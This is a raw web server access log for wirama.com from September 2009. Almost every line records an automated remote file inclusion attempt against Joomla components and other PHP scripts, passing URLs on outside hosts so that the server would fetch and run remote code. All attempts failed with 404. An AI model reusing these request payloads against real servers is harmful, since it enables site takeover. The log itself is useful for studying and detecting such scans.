58.184.252.3 - - [01/Sep/2009:20:54:59 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.184.252.3 - - [01/Sep/2009:20:54:59 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:20:57:58 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:20:57:58 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:20:57:58 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:20:58:00 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:20:58:00 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:20:58:00 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:20:58:03 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:20:58:03 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:20:58:03 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:20:58:38 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:20:58:38 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:20:58:43 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.129.166.10 - - [01/Sep/2009:20:58:49 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:20:58:49 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:20:58:49 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.150.85.170 - - [01/Sep/2009:20:59:18 -0700] "GET /cache/errors.php?error=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
218.150.85.170 - - [01/Sep/2009:20:59:18 -0700] "GET /logs/access_090701.log//cache/errors.php?error=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
218.150.85.170 - - [01/Sep/2009:20:59:18 -0700] "GET /logs//cache/errors.php?error=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
72.11.145.8 - - [01/Sep/2009:21:00:44 -0700] "GET /logs/access_090331.log/bbs/skin/zae_plan/view_foot.php//write.php?dir=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
218.150.85.170 - - [01/Sep/2009:21:00:55 -0700] "GET /logs/access_090329.log//cache/errors.php?error=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:00:55 -0700] "GET /logs/access_090701.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yd.yonsei.ac.kr/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:01:18 -0700] "GET /logs/access_090701.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yd.yonsei.ac.kr/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.198.253.216 - - [01/Sep/2009:21:04:05 -0700] "GET /administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.198.253.216 - - [01/Sep/2009:21:04:06 -0700] "GET /logs/administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.198.253.216 - - [01/Sep/2009:21:04:06 -0700] "GET /logs/access_090331.log/administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.198.253.216 - - [01/Sep/2009:21:04:11 -0700] "GET /logs/administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.198.253.216 - - [01/Sep/2009:21:04:12 -0700] "GET /administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.198.253.216 - - [01/Sep/2009:21:04:12 -0700] "GET /administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.198.253.216 - - [01/Sep/2009:21:04:13 -0700] "GET /logs/access_090331.log%20%20/administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.198.253.216 - - [01/Sep/2009:21:04:13 -0700] "GET /logs/administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.198.253.216 - - [01/Sep/2009:21:04:13 -0700] "GET /administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.198.253.216 - - [01/Sep/2009:21:04:13 -0700] "GET /logs/access_090331.log/administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.198.253.216 - - [01/Sep/2009:21:04:13 -0700] "GET /logs/administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.198.253.216 - - [01/Sep/2009:21:04:16 -0700] "GET /logs/access_090331.log%20%20/administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:04:20 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yd.yonsei.ac.kr/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.1.246.2 - - [01/Sep/2009:21:04:34 -0700] "GET /logs/access_090331.log/administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.1.246.2 - - [01/Sep/2009:21:04:34 -0700] "GET /logs/administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.1.246.2 - - [01/Sep/2009:21:04:34 -0700] "GET /administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.1.246.2 - - [01/Sep/2009:21:04:37 -0700] "GET /logs/administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.1.246.2 - - [01/Sep/2009:21:04:37 -0700] "GET /logs/access_090331.log/administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.1.246.2 - - [01/Sep/2009:21:04:37 -0700] "GET /administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.184.252.3 - - [01/Sep/2009:21:04:49 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.184.252.3 - - [01/Sep/2009:21:04:49 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:04:51 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yd.yonsei.ac.kr/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.184.252.3 - - [01/Sep/2009:21:04:54 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.198.253.216 - - [01/Sep/2009:21:06:57 -0700] "GET /logs/access_090501.log%20%20/administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:21:07:34 -0700] "GET /logs//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:21:07:34 -0700] "GET /cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:21:07:35 -0700] "GET /logs/access_090331.log%20%20//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.198.253.216 - - [01/Sep/2009:21:07:35 -0700] "GET /logs/access_090501.log%20%20/administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:21:07:36 -0700] "GET /logs/access_090331.log%20%20//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:21:07:36 -0700] "GET /logs//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:21:07:36 -0700] "GET /cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:21:07:45 -0700] "GET /logs/access_090329.log%20%20//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:21:07:46 -0700] "GET /logs/access_090329.log%20%20//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.13.86.193 - - [01/Sep/2009:21:09:15 -0700] "GET /cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.13.86.193 - - [01/Sep/2009:21:09:15 -0700] "GET /logs/access_090401.log%20%20//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.13.86.193 - - [01/Sep/2009:21:09:15 -0700] "GET /logs//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.13.86.193 - - [01/Sep/2009:21:09:25 -0700] "GET /logs//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.13.86.193 - - [01/Sep/2009:21:09:25 -0700] "GET /logs/access_090401.log%20%20//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.13.86.193 - - [01/Sep/2009:21:09:25 -0700] "GET /cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.13.86.193 - - [01/Sep/2009:21:09:40 -0700] "GET /logs/access_090331.log%20%20//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:21:09:40 -0700] "GET /logs//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.225.196.53 - - [01/Sep/2009:21:09:40 -0700] "GET /cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.225.196.53 - - [01/Sep/2009:21:09:40 -0700] "GET /logs/access_090331.log//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.85.170 - - [01/Sep/2009:21:09:46 -0700] "GET /logs//cache/errors.php?error=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
218.150.85.170 - - [01/Sep/2009:21:09:46 -0700] "GET /cache/errors.php?error=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
217.13.86.193 - - [01/Sep/2009:21:09:49 -0700] "GET /logs/access_090331.log%20%20//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:10:00 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:10:00 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:10:00 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:10:00 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:10:01 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:10:01 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:10:13 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:10:13 -0700] "GET /logs/access_090501.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:10:13 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:10:14 -0700] "GET /logs/access_090501.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:10:14 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:10:14 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:21:10:17 -0700] "GET /logs/access_090331.log//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.120 - - [01/Sep/2009:21:10:17 -0700] "GET /cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.120 - - [01/Sep/2009:21:10:17 -0700] "GET /logs//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.120 - - [01/Sep/2009:21:10:26 -0700] "GET /cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.120 - - [01/Sep/2009:21:10:26 -0700] "GET /logs//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.120 - - [01/Sep/2009:21:10:26 -0700] "GET /logs/access_090331.log//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.225.196.53 - - [01/Sep/2009:21:10:54 -0700] "GET /logs//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:21:10:54 -0700] "GET /logs/access_090331.log%20%20//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:21:10:54 -0700] "GET /cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:21:11:04 -0700] "GET /logs/access_090329.log%20%20//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:21:11:05 -0700] "GET /cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:21:11:05 -0700] "GET /logs/access_090331.log%20%20//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:21:11:05 -0700] "GET /logs//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.150.85.170 - - [01/Sep/2009:21:11:12 -0700] "GET /cache/errors.php?error=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
218.150.85.170 - - [01/Sep/2009:21:11:12 -0700] "GET /logs//cache/errors.php?error=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
218.150.85.170 - - [01/Sep/2009:21:11:12 -0700] "GET /logs/access_090401.log//cache/errors.php?error=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:21:11:14 -0700] "GET /logs/access_090329.log%20%20//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:21:11:24 -0700] "GET /logs//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:21:11:24 -0700] "GET /cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:21:11:24 -0700] "GET /logs/access_090331.log%20%20//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.150.85.170 - - [01/Sep/2009:21:11:34 -0700] "GET /logs/access.log//cache/errors.php?error=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:12:01 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:12:11 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:12:11 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:12:11 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.94.109.230 - - [01/Sep/2009:21:12:19 -0700] "GET /logs//components/com_fm/fm.install.php?lm_absolute_path=http://cr0s.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "wirama.com"
69.94.109.230 - - [01/Sep/2009:21:12:19 -0700] "GET /components/com_fm/fm.install.php?lm_absolute_path=http://cr0s.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:12:21 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:12:21 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:12:24 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:12:24 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:12:27 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:12:27 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:12:27 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:12:29 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.231.1.50 - - [01/Sep/2009:21:13:01 -0700] "GET /logs/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.231.1.50 - - [01/Sep/2009:21:13:01 -0700] "GET /logs/access_090401.log/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.231.1.50 - - [01/Sep/2009:21:13:01 -0700] "GET /admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.231.1.50 - - [01/Sep/2009:21:13:25 -0700] "GET /logs/access_090601.log/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.218.40.180 - - [01/Sep/2009:21:13:26 -0700] "GET /logs/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
